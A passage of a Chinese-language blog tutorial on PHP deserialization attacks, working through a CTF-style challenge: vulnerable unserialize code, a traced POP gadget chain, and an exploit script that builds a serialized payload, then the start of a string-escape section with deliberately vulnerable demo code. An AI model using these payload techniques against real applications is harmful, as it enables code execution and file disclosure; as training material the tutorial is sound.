id=\"kIfZu\">\u4f8b\u98984<\/h4>\n\n\n\n<p id=\"u60575a26\">\u518d\u6765\u770b\u4e00\u9898<\/p>\n\n\n\n<pre id=\"AgjIA\" class=\"wp-block-code\"><code>&lt;?php\n\/\/flag is in flag.php\nhighlight_file(__FILE__);\nerror_reporting(0);\nclass Modifier {\n    private $var;\n    public function append($value)\n    {\n        include($value);\n        echo $flag;\n    }\n    public function __invoke(){\n        $this-&gt;append($this-&gt;var);\n    }\n}\n\nclass Show{\n    public $source;\n    public $str;\n    public function __toString(){\n        return $this-&gt;str-&gt;source;\n    }\n    public function __wakeup(){\n        echo $this-&gt;source;\n    }\n}\n\nclass Test{\n    public $p;\n    public function __construct(){\n        $this-&gt;p = array();\n    }\n\n    public function __get($key){\n        $function = $this-&gt;p;\n        return $function();\n    }\n}\n\nif(isset($_GET&#91;'pop'])){\n    unserialize($_GET&#91;'pop']);\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u2e5e6a94\">\u770b\u4e86\u4e00\u4e0b\u4ee3\u7801\uff0c\u6211\u4eec\u7ed3\u5408\u6ce8\u91ca\u5f97\u77e5\u6700\u7ec8\u9700\u8981\u6267\u884cModifier::append(&#8220;flag.php&#8221;)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"621\" height=\"350\" data-attachment-id=\"82\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=82\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png\" data-orig-size=\"621,350\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-82\"  sizes=\"auto, (max-width: 621px) 100vw, 621px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1ded9f1f\">\u6267\u884cappend\u9700\u8981\u8c03\u7528Modifier\u5bf9\u8c61\u7684__invoke()\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"u014ad462\">__invoke\u7684\u89e6\u53d1\u6761\u4ef6\u662f\u5bf9\u8c61\u5f53\u4f5c\u51fd\u6570\u8c03\u7528<\/p>\n\n\n\n<p id=\"u46045883\">\u4e8e\u662f\u6211\u4eec\u53ef\u4ee5\u628aModifier\u5bf9\u8c61\u5f53\u4f5c\u51fd\u6570\u8c03\u7528<\/p>\n\n\n\n<p id=\"ufcc1d140\">\u90a3\u4e48\u95ee\u9898\u6709\u6765\u4e86\u3002\u600e\u4e48\u628a\u5bf9\u8c61\u5f53\u51fd\u6570\u8c03\u7528\uff1f<\/p>\n\n\n\n<p id=\"u5a289c37\">Test\u7c7b\u7684__get()\u65b9\u6cd5\u4f1a\u6267\u884c$function = $this-&gt;p;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"505\" height=\"175\" data-attachment-id=\"83\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=83\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png\" data-orig-size=\"505,175\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53-300x104.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-83\"  sizes=\"auto, (max-width: 505px) 100vw, 505px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u398164e5\">\u90a3\u600e\u4e48\u89e6\u53d1Test\u7684__get?<\/p>\n\n\n\n<p id=\"u7f712a8e\">\u6211\u4eec\u9700\u8981\u8bbf\u95eeTest\u5bf9\u8c61\u4e0d\u5b58\u5728\u7684\u5c5e\u6027<\/p>\n\n\n\n<p id=\"ua04bbe86\">\u90a3\u8c01\u8bbf\u95eeTest\u7684\u5c5e\u6027\u5462\uff1f<\/p>\n\n\n\n<p id=\"u0172326c\">Show\u7c7b\u7684__toString()\u4f1a\u8bbf\u95ee$this-&gt;str-&gt;source<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"605\" height=\"143\" data-attachment-id=\"84\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=84\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png\" data-orig-size=\"605,143\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54-300x71.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-54.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-84\"  sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u483b3174\">\u600e\u4e48\u89e6\u53d1Show\u7684__toString\uff1f<\/p>\n\n\n\n<p id=\"u18afdb05\">\u9700\u8981\u628aShow\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u267f25f2\">\u8c01\u4f1a\u628aShow\u5f53\u5b57\u7b26\u4e32\uff1f<\/p>\n\n\n\n<p id=\"ua482c7d0\">Show\u7684__wakeup()\u4f1aecho $this-&gt;source<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"470\" height=\"136\" data-attachment-id=\"85\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=85\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png\" data-orig-size=\"470,136\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55-300x87.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-55.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-85\"  sizes=\"auto, (max-width: 470px) 100vw, 470px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc1b54770\">\u6211\u4eec\u901a\u8fc7\u53cd\u63a8\u6cd5\u5f97\u5230pop\u94fe<\/p>\n\n\n\n<pre id=\"nKAFg\" class=\"wp-block-code\"><code>Show::__wakeup() \u2192 echo $source(Show\u5bf9\u8c61) \n\u2192 Show::__toString() \u2192 \u8bbf\u95ee $str(Test\u5bf9\u8c61)-&gt;source \n\u2192 Test::__get() \u2192 $p(Modifier\u5bf9\u8c61)() \n\u2192 Modifier::__invoke() \u2192 append($var) \u2192 include(\"flag.php\")<\/code><\/pre>\n\n\n\n<p id=\"u09e6ec18\">\u63a5\u4e0b\u6765\u5c31\u662f\u6784\u9020\u51faexp<\/p>\n\n\n\n<pre id=\"RxHlu\" class=\"wp-block-code\"><code>&lt;?php\n\/\/flag is in flag.php\nclass Modifier {\n    private $var='flag.php';\n    public function append($value)\n    {\n        system(\"calc\");\n    }\n    public function __invoke(){\n        $this-&gt;append($this-&gt;var);\n        echo \"\u89e6\u53d1\u4e86__invoke\";\n    }\n}\n\nclass Show{\n    public $source;\n    public $str;\n    public function __toString(){\n        $this-&gt;str-&gt;source;\n        echo \"\u89e6\u53d1\u4e86__toString\";\n    }\n    public function __wakeup(){\n        echo $this-&gt;source;\n        echo \"\u89e6\u53d1\u4e86__wakeup\";\n    }\n}\n\nclass Test{\n    public $p;\n    public function __construct(){\n        $this-&gt;p = array();\n        echo \"\u89e6\u53d1\u4e86__construct\".PHP_EOL;\n    }\n\n    public function __get($key){\n        $function = $this-&gt;p;\n        echo \"\u89e6\u53d1\u4e86__get\";\n    }\n}\n\n\/\/ if(isset($_GET&#91;'pop'])){\n\/\/     unserialize($_GET&#91;'pop']);\n\/\/ }\n\n$modifier = new Modifier();\n\n\n$test = new Test();\n$test-&gt;p = $modifier;\n\n\n$show2 = new Show();\n$show2-&gt;str = $test;  \n\n\n$show1 = new Show();\n$show1-&gt;source = $show2; \n\n$payload = serialize($show1);\necho urlencode($payload);\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-1024x549.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"549\" data-attachment-id=\"86\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=86\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56.png\" data-orig-size=\"1919,1029\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-300x161.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-1024x549.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-56-1024x549.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-86\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"H4Iz7\">\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u9003\u9038<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"NSZDH\">php\u53cd\u5e8f\u5217\u5316\u7279\u6027<\/h4>\n\n\n\n<p id=\"u794a0203\">1.php\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u5e95\u5c42\u4ee3\u7801\u662f\u4ee5;\u4f5c\u4e3a\u5b57\u6bb5\u7684\u5206\u9694\uff0c\u4ee5}\u4f5c\u4e3a\u7ed3\u5c3e\uff0c\u5e76\u4e14\u662f\u6839\u636e\u957f\u5ea6\u5224\u65ad\u5185\u5bb9 \uff0c\u540c\u65f6\u53cd\u5e8f\u5217\u5316\u7684\u8fc7\u7a0b\u4e2d\u5fc5\u987b\u4e25\u683c\u6309\u7167\u5e8f\u5217\u5316\u89c4\u5219\u624d\u80fd\u6210\u529f\u5b9e\u73b0\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-1024x680.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" data-attachment-id=\"87\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=87\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57.png\" data-orig-size=\"1385,920\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-300x199.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-1024x680.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-57-1024x680.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-87\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1353ddf5\">2.\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u683c\u5f0f\uff1a\u7c7b\u578b:\u957f\u5ea6:&#8221;\u5185\u5bb9&#8221; \uff0c\u5f53\u5e8f\u5217\u5316\u7684\u957f\u5ea6\u4e0d\u5bf9\u5e94\u7684\u65f6\u5019\u4f1a\u51fa\u73b0\u62a5\u9519<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-1024x622.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"622\" data-attachment-id=\"88\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=88\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58.png\" data-orig-size=\"1389,844\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-300x182.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-1024x622.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-58-1024x622.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-88\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u3cb85daf\">3.\u53ef\u4ee5\u53cd\u5e8f\u5217\u5316\u7c7b\u4e2d\u4e0d\u5b58\u5728\u7684\u5143\u7d20<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-1024x737.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"737\" data-attachment-id=\"89\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=89\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59.png\" data-orig-size=\"1361,980\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-300x216.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-1024x737.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-59-1024x737.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-89\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u4de2d909\">\u7136\u5b57\u7b26\u4e32\u9003\u9038\u5c31\u662f\u5728\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u88ab\u53cd\u5e8f\u5217\u5316\u4e4b\u524d\uff0c\u7531\u4e8e\u7ecf\u8fc7\u4e86\u66ff\u6362\u51fd\u6570\uff08\u6bd4\u5982 str_replace\uff0cpreg_replace\uff0caddslashes\uff0chtmlspecialchars\uff09\u7684\u5904\u7406\uff0c\u5bfc\u81f4\u5b57\u7b26\u4e32\u7684\u5b9e\u9645\u957f\u5ea6\u4e0e\u5e8f\u5217\u5316\u6570\u636e\u4e2d\u8bb0\u5f55\u7684\u957f\u5ea6\u4e0d\u4e00\u81f4\uff0c\u4ece\u800c\u4f7f\u653b\u51fb\u8005\u80fd\u591f\u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684 Payload \u63a7\u5236\u53cd\u5e8f\u5217\u5316\u540e\u7684\u5bf9\u8c61\u7ed3\u6784<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"ERWVp\">\u5b57\u7b26\u4e32\u51cf\u5c11<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"rJM9y\">\u5b57\u7b26\u4e32\u51cf\u5c11\u793a\u4f8b\u4ee3\u7801<\/h5>\n\n\n\n<pre id=\"iAULH\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\nerror_reporting(0);\nclass A{\n    public $v1 = \"abcsystem()system()system()\";\n    public $v2 = '123';\n\n    public function __construct($arga,$argc){\n            $this-&gt;v1 = $arga;\n            $this-&gt;v2 = $argc;\n    }\n}\n$a = $_GET&#91;'v1'];\n$b = $_GET&#91;'v2'];\n$data = serialize(new A($a,$b));\n$data = str_replace(\"system()\",\"\",$data);\nvar_dump(unserialize($data));\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u596168d0\">\u770b\u5230\u8fd9\u6bb5\u6f14\u793a\u4ee3\u7801\uff0c\u9996\u5148\u5728\u7b2c15\u884c\u7684\u65f6\u5019\uff0c\u4f1a\u8fdb\u884cserialize\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u4f1a\u786e\u5b9a\u597d\u5b57\u7b26\u4e32\u7ed3\u6784<\/p>\n\n\n\n<p id=\"u0f37fbb3\">\u7136\u540e str_replace() \u5c06 system()[8\u4e2a\u5b57\u7b26]\u66ff\u6362\u4e3a\u7a7a\u5b57\u7b26\u4e32[0\u4e2a\u5b57\u7b26] \u8fd9\u4e2a\u65f6\u5019\u5185\u5bb9\u4f1a\u53d8\u77ed\uff0c\u4f46\u662f\u53cd\u5e8f\u5217\u5316\u7ed3\u6784<\/p>\n\n\n\n<p id=\"u412da5ad\">\u7c7b\u578b:\u957f\u5ea6:&#8221;\u5185\u5bb9&#8221;<\/p>\n\n\n\n<p id=\"ue1e32fb8\">\u5176\u4e2d\u7684\u957f\u5ea6\u4e0d\u4f1a\u6539\u53d8\uff0cstr_replace\u628a$v1\u7684system() \u5168\u53d8\u6ca1\u4e86\uff0c\u817e\u51fa\u4e86\u7a7a\u95f4\uff0c\u90a3\u4e48\u5c31\u4f1a\u9020\u6210\u7ee7\u7eed\u5f80\u540e\u89e3\u6790\uff0c\u53cd\u5e8f\u5217\u5316\u65f6\uff0c$v1\u4e3a\u4e86\u51d1\u591f\u539f\u672c\u7684\u5b57\u7b26\uff0c\u53ea\u80fd\u628a\u539f\u672c\u5c5e\u4e8e\u95f4\u9694\u7b26\u3001$v2\u7684\u5c5e\u6027\u540d\u3001\u751a\u81f3$v2\u7684\u957f\u5ea6\u58f0\u660e\u90fd\u5403\u6389\u5f53\u4f5c\u666e\u901a\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u01a04b37\">\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7279\u70b9\uff0c$v1\u5403\u6389\u539f\u672c\u7684\u7ed3\u6784\u540e\uff0c\u6211\u4eec\u7d27\u63a5\u7740\u5728$v2\u7684\u5f00\u5934\u6784\u9020\u4e00\u4e2a\u65b0\u7684\u7ed3\u6784\u4ee3\u7801\uff0cPHP 